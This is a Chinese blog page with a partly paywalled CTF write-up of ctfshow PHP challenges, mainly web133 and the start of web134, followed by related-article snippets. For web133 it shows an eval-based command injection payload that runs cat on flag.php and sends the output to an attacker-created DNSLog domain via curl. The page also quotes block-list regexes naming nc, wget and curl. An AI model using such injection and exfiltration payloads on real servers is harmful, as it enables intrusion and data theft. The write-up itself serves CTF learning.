ctfshow web入门 PHP特性后篇(web133-web150)

最新推荐文章于 2024-04-21 13:56:08 发布
VIP文章 最新推荐文章于 2024-04-21 13:56:08 发布
阅读量1.7k 收藏 3
点赞数 4
文章标签: php web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ccfly1012/article/details/120273775
版权

目录

web133

web134

web135

web136

web137

web138

web139

web140

web141

web142

wen143

web144

web145-web150

web133

error_reporting(0);
highlight_file(__FILE__);
//flag.php
if($F = @$_GET['F']){
    if(!preg_match('/system|nc|wget|exec|passthru|netcat/i', $F)){
        eval(substr($F,0,6));
    }else{
        die("6个字母都还不够呀?!");
    }
}

这个题我做了好几遍终于学会了

error_reporting(0);
highlight_file(__FILE__);
//flag.php
if($F = @$_GET['F']){
    if(!preg_match('/system|nc|wget|exec|passthru|netcat/i', $F)){
        eval(substr($F,0,6));
    }else{
        die("6个字母都还不够呀?!");
    }
}

所以我们的目标就明确了,利用curl去带出来flag.php

首先在DNSLog Platform这个网站先创建一个域名

然后payload

?F=`$F`;空格curl`cat flag.php|grep "flag"`.当时创建的域名

然后再刷新,得到flag

web134

 <?php
​
/*
# -*- coding: utf-8 -*-
# @Author: Firebasky
# @Date:   2020-10-13 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-10-14 23:01:06
​
*/
​
highlight_file(__FILE__);
$key1 = 0;
$key2 = 0;
if(isset($_GET['key1']) || isset($_GET['key2']) || isset($_POST['key1']) || isset($_POST['key2'])) {
    die("nonononono");
}
@parse_str($_SERVER['QUERY_S
最低0.47元/天 解锁文章
parkour-
关注
  • 4
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
python标准库学习(后篇
02-26
执行已编译的代码execfile("hello.py")defEXECFILE(filename,locals=None,globals=None):execcompile(open(filename).read(),filename,"exec")inlocals,globalsEXECFILE("hello.py")helloagain,andwelcometotheshowhelloagain,andwelcometotheshow显式地访问__builtin__模块中的函数Python还提供了execfile函数,一个从文件加载代码,编译代码,执行代码的快捷方式.使用execfile函
软件工程课程资料-后篇
06-18
包含软件项目管理从软件实现~~面向对象实验后6个部分内容
ctfshow web139命令盲注脚本
10-21
ctfshow靶场 web入门 web139 命令盲注脚本
ctfshow web入门 SSTI
2301_79442654的博客
03-16 155
返回一个包含Python中所有类的列表,这些类都是直接或间接从。选择了列表中的第133个元素(因为索引是从0开始的)。属性,可以获得一个字典,其中包含。类的基类列表,其中第一个元素是。命令,这个命令通常用于读取名为。类定义时可用的所有全局变量。从全局变量字典中获取名为。提示“名字就是考点”
ctfshow web133和其他命令执行的骚操作
Firebasky的博客
10-15 4138
这里是总结自己最近遇到的命令执行题,感觉还是不错分享出来。也欢迎师傅们评论一些骚操作 1. ISITDTU QUALS 2020 REC <?php // error_reporting(E_ALL); // ini_set('display_errors', '1'); function trigonometric_check($code) { // Check length if (strlen($code) >= 0x100) {//256长度 retu.
CTFshow php特性 web133
Kradress的博客
12-17 2179
目录源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: Firebasky # @Date: 2020-10-13 11:25:09 # @Last Modified by: h1xa # @Last Modified time: 2020-10-13 16:43:44 */ error_reporting(0); highlight_file(__FILE__); //flag.php if($F = @$_GET['F']
ctfshow web入门 php特性 web131-web135
m0_62207170的博客
10-05 562
ctfshow web入门 php特性 web131-web135
ctfshow--web入门web101--web115&web123&web125-web133
qing_chuan_的博客
06-08 829
v2$v3反射,通俗来讲就是可以通过一个对象来获取所属类的具体内容,php中内置了强大的反射API:ReflectionClass:一个反射类,功能十分强大,内置了各种获取类信息的方法,创建方式为new ReflectionClass(str 类名),可以用echo new ReflectionClass(‘className’)打印类的信息。ReflectionObject:另一个反射类,创建方式为new ReflectionObject(对象名)。
CTFshow php特性 web135
Kradress的博客
12-17 1065
目录源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: Firebasky # @Date: 2020-10-13 11:25:09 # @Last Modified by: h1xa # @Last Modified time: 2020-10-16 18:48:03 */ error_reporting(0); highlight_file(__FILE__); //flag.php if($F = @$_GET['F']
CTFshow——PHP特性(下)
D.MIND 的博客
02-21 1877
目录:web132——逻辑运算符的优先级web133——curl -Fweb134——php变量覆盖web135—— >xx.txt 写文件web136—— tee命令 web132——逻辑运算符的优先级 打开是一个网站,访问robots.txt 得到指引/admin <?php #error_reporting(0); include("flag.php"); highlight_file(__FILE__); if(isset($_GET['username']) &&
巨量引擎-抖音上的80后、90后、00后 之 00后篇-2019.8-15页.pdf
09-15
巨量引擎-抖音上的80后、90后、00后 之 00后篇-2019.8-15页.pdf
毕业论文:光伏并网发电系统-后篇
05-23
完整优秀的毕业论文“光伏并网发电系统”设计,当时制作出实际样品进行演示,内涵流程图\软件\算法公式、源程序设计、 ...因页数比较多,特意拆成前篇、中篇、后篇发布;需要的请下全三篇文档,保你满意!
CTFSHOW PHP特性篇 (下篇132-150
羽的博客
10-21 4598
web132 if(isset($_GET['username']) && isset($_GET['password']) && isset($_GET['code'])){ $username = (String)$_GET['username']; $password = (String)$_GET['password']; $code = (String)$_GET['code']; if($code === mt_rand(1,0x
ctf_show笔记篇(web入门---php特性
whale_waves的博客
03-02 1025
原理:当md5函数加密数组时会报错NULL,当两a和b同时都是数组时,md5(a)===md5(b)等于NULL===NULL。如果b=0那么会自己去判断a是什么进制,例如a=0x开头则是18进制,0开头则是8进制,也可以直接设置b=10进制之类的。把数组的键值和键名当作变量名和变量值,例如a[b]=c那么extract(a[b]) b=c。把数组的键值和键名当作变量名和变量值,例如a[b]=c那么extract(a[b]) b=c。
ctfshow web入门 php特性 web123--web139
2301_81040377的博客
04-06 813
web133一样的东西但是我们的grep被过滤了,所以得思考一下怎么才行,但是反斜杠引号什么的没过滤,就可以用来绕过。拼接一下ctfshow{25b598bc-5a5b-4baf-a23e-2c4e9dea9d8f}必须传CTF_SHOW,CTF_SHOW.COM 不能有fl0g。就可以绕过对**isset($fl0g)**的判断,用+代表空格。先点击左边的获得域名,然后传参之后再点击右边的刷新结果。他这里对这个就讲的特别详细了,我抄一下。然后我们就可以进行类似的构造。就用argv的方法来写。
ctfshow php特性[125-135]
weixin_44770698的博客
01-16 1157
ctfshow php特性125-135
CTFshow php特性 web139
Kradress的博客
12-18 524
目录源码思路题解题解一题解二总结 源码 <?php error_reporting(0); function check($x){ if(preg_match('/\\$|\.|\!|\@|\#|\%|\^|\&|\*|\?|\{|\}|\>|\<|nc|wget|exec|bash|sh|netcat|grep|base64|rev|curl|wget|gcc|php|python|pingtouch|mv|mkdir|cp/i', $x)){ die(
ctfshow学习记录-web入门php特性147-150&150plus)
龟速更新的九某人
08-02 684
ctfshow学习记录-web入门php特性web147-web150&web150plus)
php开发工程师系统性教学】——Laravel框架(验证码)的配置和使用的保姆式教程
最新发布
php优质创造者
04-21 1595
👨‍💻。
ctfshow web134
08-09
根据引用和引用的信息,可以得知在web134中存在一个名为ctfshow的类。根据引用中的代码,ctfshow类中有一个静态方法getFlag(),该方法会输出flag.php文件的内容。根据引用中的代码,也可以通过调用ctfshow类来执行相应的操作。因此,在web134这个环境中,可以通过调用ctfshow::getFlag()来获取flag.php文件的内容。123 #### 引用[.reference_title] - *1* *3* [CTFshow——PHP特性(下)](https://blog.csdn.net/weixin_45669205/article/details/113857983)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] - *2* [ctfshow web入门 PHP特性后篇(web133-web150)](https://blog.csdn.net/ccfly1012/article/details/120273775)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值